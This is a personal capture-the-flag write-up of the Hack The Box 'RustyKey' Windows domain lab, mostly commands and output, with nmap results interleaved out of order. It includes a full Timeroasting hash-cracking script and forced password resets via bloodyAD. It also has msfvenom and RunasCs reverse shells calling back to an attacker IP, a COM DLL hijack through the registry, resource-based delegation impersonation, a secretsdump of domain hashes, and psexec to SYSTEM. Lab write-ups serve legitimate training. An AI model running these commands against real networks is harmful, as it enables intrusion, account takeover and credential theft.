Here is my note on RUSTYKEY box from Hackthebox.
RUSTYKEY: 10.129.242.90
As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account: rr.parker / 8#t5HE8L!W3A
rr.parker:8#t5HE8L!W3A
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-03 23:35:54Z)
sudo GetNPUsers.py -no-pass -dc-ip 10.129.242.90 -usersfile users.txt rustykey.htb/
#NO Asreproasting and Kerberoasting.
#How about Timeroasting ?
Timeroasting:
https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/timeroasting
https://github.com/SecuraBV/Timeroast
https://medium.com/@offsecdeer/targeted-timeroasting-stealing-user-hashes-with-ntp-b75c1f71b9ac
Prerequisites for Timeroasting:
The target must be a computer account; ordinary user accounts cannot be directly targeted (unless "Target Timeroasting" modifies their properties).
2. The target domain controller must have the NTP service running and responding with Microsoft SNTP Extended Authentication (MS-SNTP), with UDP port 123 open.
3. The attacker can send unauthenticated MS-SNTP requests to the DC (without valid credentials).
4. The attacker can enumerate the RIDs (Relative Identifiers) of computer accounts in the domain.
5. (Optional) For "Target Timeroasting," domain administrator privileges are required to temporarily modify the user account properties to treat it as a computer account.
6. The computer account passwords in the domain are not strongly protected (e.g., weak passwords or not regularly changed).
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90/Timeroast]
└─# python3 timeroast.py 10.129.242.90
1000:$sntp-ms$78b6956f0ab6e56f0d296b956af2a12e$1c0111e900000000000a11074c4f434cec634bf38b963e9be1b8428bffbfcd0aec6362666b960a98ec6362666b965cce
1104:$sntp-ms$eb8b4e995cbc22bdf0e92c513dcd1240$1c0111e900000000000a11074c4f434cec634bf38ce0688be1b8428bffbfcd0aec6362671d0109ebec6362671d014148
1103:$sntp-ms$3c355af8f8e12f98ce43e46d7bcf6431$1c0111e900000000000a11074c4f434cec634bf38b64c3cee1b8428bffbfcd0aec6362671b856026ec6362671b859fe7
1105:$sntp-ms$598be939a40532b9ee6d7a063f4162bb$1c0111e900000000000a11074c4f434cec634bf38e6d71f3e1b8428bffbfcd0aec6362671e8e16aeec6362671e8e4fb9
1106:$sntp-ms$77d1ee46632c1b3ea82da2bf85e97a0e$1c0111e900000000000a11074c4f434cec634bf38bd1625de1b8428bffbfcd0aec636267200aa2f1ec636267200ac987
1107:$sntp-ms$9c3df1a7e91ba12d98794d937fb8f8f1$1c0111e900000000000a11074c4f434cec634bf38da71b62e1b8428bffbfcd0aec63626721e0553fec63626721e08942
1118:$sntp-ms$107ca2c551d614edb17d79796a310e4c$1c0111e900000000000a11074c4f434cec634bf38be01076e1b8428bffbfcd0aec6362672ff8825dec6362672ff8b80d
1119:$sntp-ms$7e001a8f555799f6b0d66a3617123752$1c0111e900000000000a11074c4f434cec634bf38db4beb9e1b8428bffbfcd0aec63626731cd2186ec63626731cd64a2
1120:$sntp-ms$a7c2367e770cab3db251f4bd52fa1950$1c0111e900000000000a11074c4f434cec634bf38e317416e1b8428bffbfcd0aec636267366252dbec6362673662c343
1121:$sntp-ms$d536b8ec44e45e5e6f43a2b90661d31f$1c0111e900000000000a11074c4f434cec634bf38e5c2ed4e1b8428bffbfcd0aec636267368d2369ec636267368d6b8d
1122:$sntp-ms$fb33680d89f80f03d0966fdc7dda0b1d$1c0111e900000000000a11074c4f434cec634bf38c624066e1b8428bffbfcd0aec636267386a40e6ec636267386a890a
1123:$sntp-ms$83e2de7c62e4c2fe4b9ea3981ee96612$1c0111e900000000000a11074c4f434cec634bf38deebe8fe1b8428bffbfcd0aec63626739f6c0bcec63626739f70585
1124:$sntp-ms$df923bfbf44f3ac33cd4be9b962b3666$1c0111e900000000000a11074c4f434cec634bf38b4f6167e1b8428bffbfcd0aec6362673b700cd8ec6362673b7036c9
1125:$sntp-ms$70c9c3cb751c117dcc6cf39760d50687$1c0111e900000000000a11074c4f434cec634bf38d67084ce1b8428bffbfcd0aec6362673d87ad08ec6362673d87ecc8
1126:$sntp-ms$ae709d09305e19f34ef6f3f6eace656f$1c0111e900000000000a11074c4f434cec634bf38d684563e1b8428bffbfcd0aec6362673d88e6c3ec6362673d892329
1127:$sntp-ms$979530097deb251d798191bedf1befef$1c0111e900000000000a11074c4f434cec634bf38b5db9efe1b8428bffbfcd0aec6362673f96e9bbec6362673f972621
timecrack-fixed.py: #Fixed version of timecrack.
```
#!/usr/bin/env python3
"""
Perform a simple dictionary attack against the output of timeroast.py.
The NTP 'hash' format does not fit into Hashcat or John right now.
Not even optimized, but still useful for cracking legacy default passwords
(where the password is the computer name) or specific default passwords
that are popular in an organization.
"""
import hashlib
import sys
import re
from binascii import unhexlify
from argparse import ArgumentParser, FileType, RawDescriptionHelpFormatter
from typing import TextIO, Generator, Tuple
# Expected format: rid:$sntp-ms$<hashval>$<salt>
HASH_FORMAT = r'^(?P<rid>\d+):\$sntp-ms\$(?P<hashval>[0-9a-f]{32})\$(?P<salt>[0-9a-f]{96})$'
def md4(data: bytes) -> bytes:
"""Return an MD4 digest, fallback to pure Python if not in OpenSSL."""
try:
return hashlib.new('md4', data).digest()
except ValueError:
from md4 import MD4 # Fallback module (needs to be available)
return MD4(data).bytes()
def compute_hash(password: str, salt: bytes) -> bytes:
"""Compute a legacy NTP authenticator 'hash'."""
return hashlib.md5(md4(password.encode('utf-16le')) + salt).digest()
def try_crack(hashfile: TextIO, dictfile: TextIO) -> Generator[Tuple[int, str], None, None]:
"""Try to crack hashes using a given dictionary."""
hashes = []
for line in hashfile:
line = line.strip()
if line:
m = re.match(HASH_FORMAT, line)
if not m:
print(f'ERROR: invalid hash format: {line}', file=sys.stderr)
sys.exit(1)
rid, hashval, salt = m.group('rid', 'hashval', 'salt')
hashes.append((int(rid), unhexlify(hashval), unhexlify(salt)))
for password in dictfile:
password = password.strip()
for rid, hashval, salt in hashes:
if compute_hash(password, salt) == hashval:
yield rid, password
def main():
argparser = ArgumentParser(
formatter_class=RawDescriptionHelpFormatter,
description="""Perform a simple dictionary attack against the output of timeroast.py.
Not even optimized, but still useful for cracking legacy default
passwords (where the password is the computer name) or specific default
passwords that are popular in an organization.
"""
)
argparser.add_argument('hashes', type=FileType('r'),
help='Output of timeroast.py')
argparser.add_argument('dictionary', type=lambda f: open(f, encoding='latin-1'),
help='Line-delimited password dictionary (e.g. rockyou.txt)')
args = argparser.parse_args()
crackcount = 0
for rid, password in try_crack(args.hashes, args.dictionary):
print(f'[+] Cracked RID {rid} password: {password}')
crackcount += 1
print(f'\n{crackcount} passwords recovered.')
if __name__ == '__main__':
main()
```
python3 timecrack-fixed.py hash.txt /usr/share/wordlists/rockyou.txt
IT_COMPUTER3$:Rusty88!
BLOODHOUND DATA:
IT_COMPUTER3$ -> AddSelf -> HELPSELF Group:
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
HELPSELF Group -> ForceChangePassword -> BB.MORGAN:
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password BB.MORGAN 'Password123@'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'
getTGT.py rustykey.htb/bb.morgan:'Password123@' -dc-ip 10.129.242.90
export KRB5CCNAME=bb.morgan.ccache
evil-winrm -i dc.rustykey.htb -r rustykey.htb
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# evil-winrm -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> whoami
rustykey\bb.morgan
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> hostname
dc
USER-SHELL !
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
nxc ldap dc.rustykey.htb -u rr.parker -p '8#t5HE8L!W3A' --dns-tcp --dns-server 10.129.242.90 -k --bloodhound --collection All
nxc ldap dc.rustykey.htb -u rr.parker -p '8#t5HE8L!W3A' -k --asreproast output.txt
nxc ldap dc.rustykey.htb -u rr.parker -p '8#t5HE8L!W3A' -k --kerberoasting output.txt
#NOPE and DON'T BOTHER kerberoasting and asreproasting.
445/tcp open microsoft-ds?
No Guest.
NT_STATUS_NOT_SUPPORT = Kerberos Authentication ?
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# cat /etc/krb5.conf
[libdefaults]
default_realm = RUSTYKEY.HTB
dns_lookup_kdc = false
dns_lookup_realm = false
[realms]
RUSTYKEY.HTB = {
kdc = dc.rustykey.htb
admin_server = dc.rustykey.htb
default_domain = rustykey.htb
}
[domain_realm]
.rustykey.htb = RUSTYKEY.HTB
rustykey.htb = RUSTYKEY.HTB
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# crackmapexec smb dc.rustykey.htb -d rustykey.htb -u rr.parker -p '8#t5HE8L!W3A' -k
SMB dc.rustykey.htb 445 dc.rustykey.htb [*] x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
SMB dc.rustykey.htb 445 dc.rustykey.htb [+] rustykey.htb\rr.parker:8#t5HE8L!W3A
crackmapexec smb dc.rustykey.htb -d rustykey.htb -u rr.parker -p '8#t5HE8L!W3A' -k --shares
SMB dc.rustykey.htb 445 dc.rustykey.htb [*] x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
SMB dc.rustykey.htb 445 dc.rustykey.htb [+] rustykey.htb\rr.parker:8#t5HE8L!W3A
SMB dc.rustykey.htb 445 dc.rustykey.htb [+] Enumerated shares
SMB dc.rustykey.htb 445 dc.rustykey.htb Share Permissions Remark
SMB dc.rustykey.htb 445 dc.rustykey.htb ----- ----------- ------
SMB dc.rustykey.htb 445 dc.rustykey.htb ADMIN$ Remote Admin
SMB dc.rustykey.htb 445 dc.rustykey.htb C$ Default share
SMB dc.rustykey.htb 445 dc.rustykey.htb IPC$ READ Remote IPC
SMB dc.rustykey.htb 445 dc.rustykey.htb NETLOGON READ Logon server share
SMB dc.rustykey.htb 445 dc.rustykey.htb SYSVOL READ Logon server share
getTGT.py rustykey.htb/rr.parker:'8#t5HE8L!W3A' -dc-ip 10.129.242.90
export KRB5CCNAME=rr.parker.ccache
sudo lookupsid.py -k rr.parker@10.129.242.90 | tee usernames
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
#Based on Bloodhound Data:
getTGT.py rustykey.htb/bb.morgan:'Password123@' -dc-ip 10.129.242.90
export KRB5CCNAME=bb.morgan.ccache
evil-winrm -i dc.rustykey.htb -r rustykey.htb
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# evil-winrm -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> whoami
rustykey\bb.morgan
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> hostname
dc
USER-SHELL !
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> whoami
rustykey\bb.morgan
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> hostname
dc
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> dir
Directory: C:\Users\bb.morgan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/4/2025 9:15 AM 1976 internal.pdf
-ar--- 9/3/2025 4:22 PM 34 user.txt
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
bb.morgan -> ee.reed:
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# evil-winrm -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ..
*Evil-WinRM* PS C:\Users\bb.morgan> cd Desktop
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> download internal.pdf
Info: Downloading C:\Users\bb.morgan\Desktop\internal.pdf to internal.pdf
Info: Download successful!
internal.pdf:
Internal Memo
From: bb.morgan@rustykey.htb
To: support-team@rustykey.htb
Subject: Support Group - Archiving Tool Access
Date: Mon, 10 Mar 2025 14:35:18 +0100
Hey team,
As part of the new Support utilities rollout, extended access has been temporarily granted to allow
testing and troubleshooting of file archiving features across shared workstations.
This is mainly to help streamline ticket resolution related to extraction/compression issues reported
by the Finance and IT teams. Some newer systems handle context menu actions differently, so
registry-level adjustments are expected during this phase.
A few notes:
- Please avoid making unrelated changes to system components while this access is active.
- This permission change is logged and will be rolled back once the archiving utility is confirmed
stable in all environments.
- Let DevOps know if you encounter access errors or missing shell actions.
Thanks,
BB Morgan
IT Department
Page 1
EE.REED is a member of support-team group.
IT-COMPUTER3$ -> AddSelf -> HELPDESK Group:
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
HELPSELF Group -> ForceChangePassword -> EE.REED:
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password EE.REED 'Password123@'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HELPDESK
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password EE.REED 'Password123@'
[+] Password changed successfully!
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'
[-] SUPPORT removed from PROTECTED OBJECTS
./RunasCs.exe ee.reed Password123@ powershell.exe -r 10.10.14.170:1234
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.170] from (UNKNOWN) [10.129.242.90] 64092
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
rustykey\ee.reed
PS C:\Windows\system32> hostname
hostname
dc
ee.reed SHELL !
ee.reed -> mm.turner:
#FROM internal.pdf: It mentioned something about archive so it's probably 7-zip or zip like that.
PS C:\Windows\system32> reg query "HKCU\Software\Classes\*\shellex\ContextMenuHandlers"
reg query "HKCU\Software\Classes\*\shellex\ContextMenuHandlers"
ERROR: The system was unable to find the specified registry key or value.
PS C:\Windows\system32> reg query "HKLM\Software\Classes\*\shellex\ContextMenuHandlers"
reg query "HKLM\Software\Classes\*\shellex\ContextMenuHandlers"
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\7-Zip
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\ModernSharing
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\Open With
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\Sharing
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}
HKEY_LOCAL_MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
reg query "HKLM\Software\Classes\*\shellex\ContextMenuHandlers\7-Zip"
PS C:\Windows\system32> reg query "HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}" /s
reg query "HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}" /s
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}
(Default) REG_SZ 7-Zip Shell Extension
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
(Default) REG_SZ C:\Program Files\7-Zip\7-zip.dll
ThreadingModel REG_SZ Apartment
PS C:\Windows\system32> icacls "C:\Program Files\7-Zip\7-zip.dll"
icacls "C:\Program Files\7-Zip\7-zip.dll"
C:\Program Files\7-Zip\7-zip.dll NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
DLL Hijacking: DLL Injection
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.170 LPORT=4444 -f dll -o rev.dll
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}
(Default) REG_SZ 7-Zip Shell Extension
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
(Default) REG_SZ C:\Program Files\7-Zip\7-zip.dll
ThreadingModel REG_SZ Apartment
PS C:\Windows\system32> mkdir C:\Temp
mkdir C:\Temp
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/3/2025 7:40 PM Temp
PS C:\Windows\system32> cd C:\Temp
cd C:\Temp
PS C:\Temp> dir
dir
PS C:\Temp>
nc -lnvp 1234 (on other shell)
$clsid = 'HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}'
Set-ItemProperty "$clsid\InprocServer32" '(default)' 'C:\tmp\rev.dll'
reg add "HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tmp\rev.dll" /f
$clsid = 'HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}'
Set-ItemProperty "$clsid\InprocServer32" '(default)' 'C:\Temp\rev.dll'
reg add "HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Temp\rev.dll" /f
sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.170] from (UNKNOWN) [10.129.242.90] 60645
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>whoami
whoami
rustykey\mm.turner
C:\Windows>hostname
hostname
dc
mm.turner SHELL !
BLOODHOUND DATA:
mm.turner -> Member of DelegationManager -> AddAllowedToAct -> dc.rustykey.htb: #RBCD Attack.
#We are going to point it to IT-COMPUTER3$ since we have a password for it.
Get-DomainComputer IT-COMPUTER3$ | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
Get-ADComputer DC -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
PS C:\Users\mm.turner> Get-ADComputer DC -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
Get-ADComputer DC -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
DistinguishedName : CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
DNSHostName : dc.rustykey.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : dee94947-219e-4b13-9d41-543a4085431c
SamAccountName : DC$
SID : S-1-5-21-3316070415-896458127-4139322052-1000
UserPrincipalName :
Enabled: True = #This is the one you looking for.
backupadmin user -> DCSYNC -> dc.rustykey.htb
getTGT.py rustykey.htb/IT-COMPUTER3$:'Rusty88!' -dc-ip 10.129.242.90
export KRB5CCNAME='IT-COMPUTER3$.ccache'
getST.py -spn 'cifs/dc.rustykey.htb' -impersonate 'backupadmin' 'rustykey.htb/IT-COMPUTER3$:Rusty88!'
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# getST.py -spn 'cifs/dc.rustykey.htb' -impersonate 'backupadmin' 'rustykey.htb/IT-COMPUTER3$:Rusty88!'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Impersonating backupadmin
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin.ccache
export KRB5CCNAME=backupadmin.ccache
secretsdump.py -k -no-pass backupadmin@dc.rustykey.htb
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# secretsdump.py -k -no-pass backupadmin@dc.rustykey.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b
299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe35
4af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3ad
db4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword
RUSTYKEY\Administrator:Rustyrc4key#!
Administrator:Rustyrc4key#!
getTGT.py rustykey.htb/Administrator:'Rustyrc4key#!' -dc-ip 10.129.242.90
export KRB5CCNAME=Administrator.ccache
psexec -k -no-pass administrator@dc.rustykey.htb
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# psexec.py -k -no-pass administrator@dc.rustykey.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on dc.rustykey.htb.....
[*] Found writable share ADMIN$
[*] Uploading file avOFZyJO.exe
[*] Opening SVCManager on dc.rustykey.htb.....
[*] Creating service QzwM on dc.rustykey.htb.....
[*] Starting service QzwM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
dc
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
dc
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 00BA-0DBE
Directory of C:\Users\Administrator\Desktop
06/24/2025 10:00 AM <DIR> .
06/24/2025 10:00 AM <DIR> ..
09/03/2025 04:22 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,515,936,768 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
63277/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows